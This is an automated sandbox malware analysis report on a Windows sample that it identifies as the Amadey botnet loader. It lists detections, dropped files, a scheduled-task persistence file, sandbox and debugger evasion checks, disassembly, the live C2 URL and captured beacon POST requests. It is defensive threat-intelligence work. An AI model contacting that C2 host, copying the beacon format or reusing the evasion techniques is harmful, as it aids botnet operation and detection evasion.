
Windows Analysis Report
Jl5yg1Km2s.exe

Overview

General Information

Sample name: Jl5yg1Km2s.exe (renamed because the original name is a hash value)
Original sample name: 724f6f07b8d94b11184884da8fcf987cf43ce7020adf24240e213b65d2f93b4f.exe
Analysis ID: 1483218
MD5: 1c198a27c76f075b7901945f67ed0115
SHA1: 335479dd8185471a31c464ec4bf5a3b4c3430c67
SHA256: 724f6f07b8d94b11184884da8fcf987cf43ce7020adf24240e213b65d2f93b4f
Tags: Amadey, exe

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Jl5yg1Km2s.exe (PID: 6896 cmdline: "C:\Users\user\Desktop\Jl5yg1Km2s.exe" MD5: 1C198A27C76F075B7901945F67ED0115)
    • explorti.exe (PID: 2172 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: 1C198A27C76F075B7901945F67ED0115)
  • explorti.exe (PID: 736 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 1C198A27C76F075B7901945F67ED0115)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware configuration (Amadey): {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Source | Rule | Description | Author | Strings
00000001.00000003.1777304943.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000006.00000003.2310206865.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000000.00000003.1721841303.0000000005210000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000006.00000002.2350558815.00000000003E1000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
1.2.explorti.exe.3e0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
6.2.explorti.exe.3e0000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
0.2.Jl5yg1Km2s.exe.a00000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

No Sigma rule has matched
No Snort rule has matched
Timestamp: 2024-07-26T21:08:18.169836+0200
SID: 2022930
Source Port: 443
Destination Port: 49732
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-26T21:09:12.919252+0200
SID: 2856147
Source Port: 49751
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-26T21:08:15.512214+0200
SID: 2856147
Source Port: 49730
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-26T21:08:23.668370+0200
SID: 2856147
Source Port: 49736
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-26T21:08:31.809183+0200
SID: 2856147
Source Port: 49740
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 2024-07-26T21:08:56.594028+0200
SID: 2022930
Source Port: 443
Destination Port: 49747
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: Jl5yg1Km2s.exe | Avira: detected
Source: http://77.91.77.82/Hun4Ko/index.php | URL Reputation: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php? | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: explorti.exe.2172.1.memstrmin | Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | ReversingLabs: Detection: 78%
Source: Jl5yg1Km2s.exe | ReversingLabs: Detection: 78%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Joe Sandbox ML: detected
Source: Jl5yg1Km2s.exe | Joe Sandbox ML: detected
Source: Jl5yg1Km2s.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Malware configuration extractor | IPs: 77.91.77.82
Source: global traffic | HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 77.91.77.82 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: global traffic | HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 77.91.77.82 | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 | Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: Joe Sandbox View | IP Address: 77.91.77.82
Source: Joe Sandbox View | ASN Name: FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU
Source: unknown | TCP traffic detected without corresponding DNS query: 77.91.77.82
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_003EDFA0 recv,recv,recv,recv
Source: unknown | HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 77.91.77.82 | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
Source: explorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php$
Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php2
Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php8
Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php?
Source: explorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpKR
Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpe

                  System Summary

Source: Jl5yg1Km2s.exe | Static PE information: section name:
Source: Jl5yg1Km2s.exe | Static PE information: section name: .idata
Source: Jl5yg1Km2s.exe | Static PE information: section name:
Source: explorti.exe.0.dr | Static PE information: section name:
Source: explorti.exe.0.dr | Static PE information: section name: .idata
Source: explorti.exe.0.dr | Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_00423048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_003EE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_003E4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_00417D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_0042763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_00426EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_003E4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_0042775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_00428700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_00422BB0
Source: Jl5yg1Km2s.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Jl5yg1Km2s.exe | Static PE information: Section: ZLIB complexity 0.9978921191939891
Source: Jl5yg1Km2s.exe | Static PE information: Section: cqehubfu ZLIB complexity 0.9945843322554268
Source: explorti.exe.0.dr | Static PE information: Section: ZLIB complexity 0.9978921191939891
Source: explorti.exe.0.dr | Static PE information: Section: cqehubfu ZLIB complexity 0.9945843322554268
Source: explorti.exe.0.dr | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: Jl5yg1Km2s.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File created: C:\Users\user\AppData\Local\Temp\ad40971b6b
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Jl5yg1Km2s.exe | ReversingLabs: Detection: 78%
Source: Jl5yg1Km2s.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File read: C:\Users\user\Desktop\Jl5yg1Km2s.exe
Source: unknown | Process created: C:\Users\user\Desktop\Jl5yg1Km2s.exe "C:\Users\user\Desktop\Jl5yg1Km2s.exe"
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: mstask.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: Jl5yg1Km2s.exe | Static file information: File size 1924608 > 1048576
Source: Jl5yg1Km2s.exe | Static PE information: Raw size of cqehubfu is bigger than: 0x100000 < 0x1a4600

                  Data Obfuscation

Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Unpacked PE file: 0.2.Jl5yg1Km2s.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Unpacked PE file: 6.2.explorti.exe.3e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cqehubfu:EW;gcjpmbpo:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: explorti.exe.0.dr | Static PE information: real checksum: 0x1e1da4 should be: 0x1d63c5
Source: Jl5yg1Km2s.exe | Static PE information: real checksum: 0x1e1da4 should be: 0x1d63c5
Source: Jl5yg1Km2s.exe | Static PE information: section name:
Source: Jl5yg1Km2s.exe | Static PE information: section name: .idata
Source: Jl5yg1Km2s.exe | Static PE information: section name:
Source: Jl5yg1Km2s.exe | Static PE information: section name: cqehubfu
Source: Jl5yg1Km2s.exe | Static PE information: section name: gcjpmbpo
Source: Jl5yg1Km2s.exe | Static PE information: section name: .taggant
Source: explorti.exe.0.dr | Static PE information: section name:
Source: explorti.exe.0.dr | Static PE information: section name: .idata
Source: explorti.exe.0.dr | Static PE information: section name:
Source: explorti.exe.0.dr | Static PE information: section name: cqehubfu
Source: explorti.exe.0.dr | Static PE information: section name: gcjpmbpo
Source: explorti.exe.0.dr | Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_003FD82C push ecx; ret 1_2_003FD83F
Source: Jl5yg1Km2s.exe | Static PE information: section name: entropy: 7.97975540171384
Source: Jl5yg1Km2s.exe | Static PE information: section name: cqehubfu entropy: 7.9529251999211485
Source: explorti.exe.0.dr | Static PE information: section name: entropy: 7.97975540171384
Source: explorti.exe.0.dr | Static PE information: section name: cqehubfu entropy: 7.9529251999211485
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                  Boot Survival

Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | File opened: Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | File opened: HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: A6F29F second address: A6F2BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: A6F2BF second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F1CC8B8C9F0h 0x0000000e push dword ptr [ebp+122D1585h] 0x00000014 xor dword ptr [ebp+122D1ED3h], edx 0x0000001a call dword ptr [ebp+122D1BDCh] 0x00000020 pushad 0x00000021 jc 00007F1CC8B8C9E7h 0x00000027 clc 0x00000028 xor eax, eax 0x0000002a cmc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f sub dword ptr [ebp+122D1E72h], edx 0x00000035 mov dword ptr [ebp+122D2B3Bh], eax 0x0000003b mov dword ptr [ebp+122D1E72h], edx 0x00000041 mov dword ptr [ebp+122D2EACh], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F1CC8B8C9F9h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 jmp 00007F1CC8B8C9F4h 0x0000005a stc 0x0000005b lodsw 0x0000005d mov dword ptr [ebp+122D2EACh], edi 0x00000063 sub dword ptr [ebp+122D1E72h], ecx 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jl 00007F1CC8B8C9E7h 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 clc 0x00000079 jp 00007F1CC8B8C9ECh 0x0000007f mov dword ptr [ebp+122D2E13h], edx 0x00000085 nop 0x00000086 push eax 0x00000087 push edx 0x00000088 push edx 0x00000089 pushad 0x0000008a popad 0x0000008b pop edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: A6EB20 second address: A6EB36 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1CC8BB7C3Ch 0x00000008 jno 00007F1CC8BB7C36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: A6EB36 second address: A6EB48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9EDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: A6EB48 second address: A6EB4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: A6EB4E second address: A6EB52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE7486 second address: BE748C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE748C second address: BE7490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE675A second address: BE6763 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9BF5 second address: BE9BFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9BFA second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 37766346h 0x0000000e push dword ptr [ebp+122D1585h] 0x00000014 movzx edi, bx 0x00000017 call dword ptr [ebp+122D1BDCh] 0x0000001d pushad 0x0000001e jc 00007F1CC8BB7C37h 0x00000024 clc 0x00000025 xor eax, eax 0x00000027 cmc 0x00000028 mov edx, dword ptr [esp+28h] 0x0000002c sub dword ptr [ebp+122D1E72h], edx 0x00000032 mov dword ptr [ebp+122D2B3Bh], eax 0x00000038 mov dword ptr [ebp+122D1E72h], edx 0x0000003e mov dword ptr [ebp+122D2EACh], ebx 0x00000044 mov esi, 0000003Ch 0x00000049 jmp 00007F1CC8BB7C49h 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 jmp 00007F1CC8BB7C44h 0x00000057 stc 0x00000058 lodsw 0x0000005a mov dword ptr [ebp+122D2EACh], edi 0x00000060 sub dword ptr [ebp+122D1E72h], ecx 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a jl 00007F1CC8BB7C37h 0x00000070 clc 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 clc 0x00000076 jp 00007F1CC8BB7C3Ch 0x0000007c mov dword ptr [ebp+122D2E13h], edx 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 push edx 0x00000086 pushad 0x00000087 popad 0x00000088 pop edx 0x00000089 rdtsc
